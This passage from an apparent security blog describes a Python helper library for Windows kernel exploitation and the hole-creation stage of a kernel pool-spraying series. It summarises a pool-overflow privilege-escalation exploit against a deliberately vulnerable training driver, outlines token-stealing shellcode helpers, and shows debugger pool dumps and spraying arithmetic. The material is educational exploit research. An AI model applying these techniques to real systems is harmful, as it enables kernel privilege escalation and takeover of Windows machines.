def get_haldisp_ofsetsx86():
def get_haldisp_ofsetsx64():
def setosvariablesx86():
def setosvariablesx64():
def retore_hal_ptrs(HalDispatchTable,HaliQuerySystemInformation,HalpSetSystemInformation):
def restoretokenx86(RETVAL, extra = ""):
def tokenstealingx86(RETVAL, extra = ""):
def tokenstealingx64(RETVAL, extra = ""):
def tokenstealing(RETVAL, extra = ""):

Basically, these are functions to help with finding various offsets based on the OS version, finding the HalDispatchTable location, generating token stealing shellcode for various platforms and cases, and allocating memory, plus a set of functions that I created as part of my kernel pool spraying fun series :) like spraying and creating holes based only on the pool size we know; we don't need to prepare anything or worry about the objects. This was in my plans a long time ago, but somehow it fell off the table. I do plan to catch up with this 'project' and start adding other stuff, like bitmap read/write primitives, which are needed for newer OSs.

Not all functions were developed by me; some parts were taken from various sources, and I tried to indicate that. I might have modified them to my needs, like adding parameters, but I still wanted to indicate the source and not take credit for it.

So what's the difference? My original HackSysExtremeVulnerableDriver pool overflow exploit, found here, is 200 lines:

With the kex helpers it's about 50, which is much nicer, and you don't need to worry about many things.

Our required hole size is 0x200 (HEVD allocates a 0x1f8-byte buffer, but it takes 0x200 in the pool: buffer + 8-byte POOL_HEADER).
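
The same calculation works for any requested buffer size. A minimal sketch, assuming the x86 values used in this post (8-byte POOL_HEADER, 8-byte granularity); the function name is mine:

```python
X86_POOL_HEADER_SIZE = 8
X86_POOL_GRANULARITY = 8

def required_hole_size(requested_bytes):
    """Space a small pool allocation occupies on x86, header included."""
    raw = requested_bytes + X86_POOL_HEADER_SIZE
    # round up to the next multiple of the pool granularity
    return (raw + X86_POOL_GRANULARITY - 1) & ~(X86_POOL_GRANULARITY - 1)

hevd_hole = required_hole_size(0x1f8)
```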

A summary of this HEVD exploit:
  1. open the driver
  2. allocate our input at 0x41410000, which consists of 0x1f8 bytes of random data, plus the additional overflow part
  3. put the value 0x42424242 at 0x00000060 (pointer to the "CloseProcedure" function handler)
  4. generate a token stealing shellcode and allocate it at 0x42424242
  5. spray the kernel pool, and make holes (multiple)
  6. call the driver vulnerable function to make the overflow
  7. close all handles to trigger our shellcode
  8. open cmd.exe

The exploit works very reliably; I ran it quite a few times.

You can find kex here:

If you find any bugs, please report them. I tried to filter out everything and test most of the functions, but you never know.

Thursday, September 14, 2017

Windows kernel pool spraying fun - Part 3 - Let's make holes

Maybe I should have started this whole series with some explanation. I want to make some scripts that help make Windows kernel exploit development faster, and my first run is with pool spraying. Also, if you have never read about kernel pool overflows and exploiting them with pool spraying, maybe read this:

Now that we have a decent list of kernel object sizes (and the script can be run on other platforms, although I probably need to make some changes for the x64 architecture), we can 'automate' the spraying and hole creation process if we know the hole size we require.

  1. Once we have analyzed the vulnerability, we will know the size of the object / buffer the driver allocates in the pool
  2. We need to control the placement of that allocation, so we need to prepare a hole of the given size in the pool, so that the kernel will allocate the new object there
  3. If we know the size, we can simply calculate which objects are good for our spraying and how many of them need to be freed
  4. If we know all of that, we can spray the kernel and make a hole

We will need info about the object and pool headers that we overwrite with the overflow, but I will deal with that later, as it's not required for the hole creation. I might be wrong, but with some preparation I hope that the overwriting data can be generated automatically as well. For now, I just want to make holes of a given size. So I made a script for this, which is available here (please keep in mind that it's hardcoded for Win7 SP1 x86):

It will ask for the hole size you want, do the spraying, free up the space and show that area in WinDBG. Also note that it still uses the local kernel debugger, where we can't set breakpoints, so there is a race condition when we issue the !pool command, as some other kernel component can allocate in the free space. The reason I'm still on local kernel debugging is that it's much simpler for the demonstration. When I get to the actual exploit demo, I will need remote debugging, but I can use the functions I demo here. So here is the output:

lkd> !py c:\users\csaby\desktop\
Give me the size of the hole in hex: 440
Process: 8572bd40
Object location: 857e15f0
Pool page 857e15f0 region is Nonpaged pool
 857e1000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 857e1040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1080 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e10c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1180 size:   40 previous size:   40  (Free )  Even (Protected)
 857e11c0 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1200 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1240 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1280 size:   40 previous size:   40  (Free )  Even (Protected)
 857e12c0 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1300 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1340 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1380 size:   40 previous size:   40  (Free )  Even (Protected)
 857e13c0 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1400 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1440 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1480 size:   40 previous size:   40  (Free )  Even (Protected)
 857e14c0 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1500 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1540 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1580 size:   40 previous size:   40  (Free )  Even (Protected)
*857e15c0 size:   40 previous size:   40  (Allocated) *Even (Protected)
Pooltag Even : Event objects
 857e1600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1680 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e16c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1740 size:   40 previous size:   40  (Allocated)  Even (Protected)

You can see that we have 17 x 0x40 bytes of free space, which is exactly 0x440, and that I didn't have to deal with the details. I can give any other size, e.g.:

lkd> !py c:\users\csaby\desktop\
Give me the size of the hole in hex: 260
Process: 8572bd40
Object location: 87b2fe00
Pool page 87b2fe00 region is Nonpaged pool
 87b2f000 size:   98 previous size:    0  (Allocated)  IoCo (Protected)
 87b2f098 size:   90 previous size:   98  (Free)       ....
 87b2f128 size:   98 previous size:   90  (Allocated)  IoCo (Protected)
 87b2f1c0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f258 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f2f0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f388 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f420 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f4b8 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f550 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f5e8 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f680 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f718 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f7b0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f848 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f8e0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f978 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2fa10 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2faa8 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2fb40 size:   98 previous size:   98  (Free )  IoCo (Protected)
 87b2fbd8 size:   98 previous size:   98  (Free )  IoCo (Protected)
 87b2fc70 size:   98 previous size:   98  (Free )  IoCo (Protected)
 87b2fd08 size:   98 previous size:   98  (Free )  IoCo (Protected)
*87b2fda0 size:   98 previous size:   98  (Allocated) *IoCo (Protected)
Owning component : Unknown (update pooltag.txt)
 87b2fe38 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2fed0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2ff68 size:   98 previous size:   98  (Allocated)  IoCo (Protected)

As we can see, the spraying adapts to our needs. Note that different objects were used this time (4 x 0x98 = 0x260). If you test it many times, try to use a size that results in a different object being sprayed, so you get a cleaner output.
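
The selection behind both runs boils down to finding an object whose pool size divides the hole size evenly. Here is a minimal sketch of that idea, not the actual script: the size table only contains the two sizes visible in the !pool outputs above plus the Mutant size from Part 4, the names are mine, and preferring the fewest objects is my own tie-break.

```python
# Pool chunk sizes on Win7 SP1 x86 as seen in the !pool outputs (header included).
OBJECT_SIZES = {"Event": 0x40, "Mutant": 0x50, "IoCo": 0x98}

def pick_spray_object(required_hole_size, sizes=OBJECT_SIZES):
    """Return (object name, number of objects to free), or None if nothing fits."""
    candidates = [(name, required_hole_size // size)
                  for name, size in sizes.items()
                  if required_hole_size % size == 0]
    if not candidates:
        return None
    # prefer the candidate that needs the fewest adjacent objects freed
    return min(candidates, key=lambda candidate: candidate[1])

choice_440 = pick_spray_object(0x440)
choice_260 = pick_spray_object(0x260)
```

With this table, 0x440 maps to 17 Event objects and 0x260 to 4 IoCo objects, the same as the two outputs above.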

Another important thing to note is that the hole creation is not 100% reliable here, but I believe it's very close. What I do is the following: I spray the kernel with 100000 objects, and free X of them in the middle. Very likely those were allocated next to each other and give us the space we need when I free them, and for demonstrating the 'automation' this was the easiest. It could be more reliable if:
  1. I try to make multiple holes, by freeing multiple runs of X handles, each run possibly adjacent in memory
  2. There is a way to leak the addresses of the objects from the kernel and calculate whether they are next to each other, and thus free up the space that way. This would be the most reliable method.

As I progress, I will implement these, but for now the first method will do.
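
The bookkeeping for 'free X in the middle', and for the multiple-hole variant, is just index arithmetic over the list of sprayed handles. A sketch with made-up helper names, assuming the handles are kept in allocation order:

```python
def middle_run(total_sprayed, objects_per_hole):
    """Indices of one run of consecutive handles in the middle of the spray."""
    start = (total_sprayed - objects_per_hole) // 2
    return list(range(start, start + objects_per_hole))

def spaced_runs(total_sprayed, objects_per_hole, holes, gap):
    """Indices for several runs, centred in the spray, `gap` handles kept between runs."""
    span = holes * objects_per_hole + (holes - 1) * gap
    if span > total_sprayed:
        raise ValueError("spray is too small for the requested holes")
    start = (total_sprayed - span) // 2
    step = objects_per_hole + gap
    return [list(range(start + i * step, start + i * step + objects_per_hole))
            for i in range(holes)]

single_hole = middle_run(100000, 17)
three_holes = spaced_runs(100000, 4, 3, 10)
```

Each inner list is one candidate hole; closing the handles at those indices frees the objects, and keeping a gap between the runs stops neighbouring holes from merging into one larger free chunk.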

And yes, I code in Python, and not PowerShell, simply because I can't code in PS, but I fully agree with everyone who says that making this in PS would make much more sense.

Part 4 will come later, as I will be busy in the next 2 weeks and possibly have no time for this, but I will catch up after.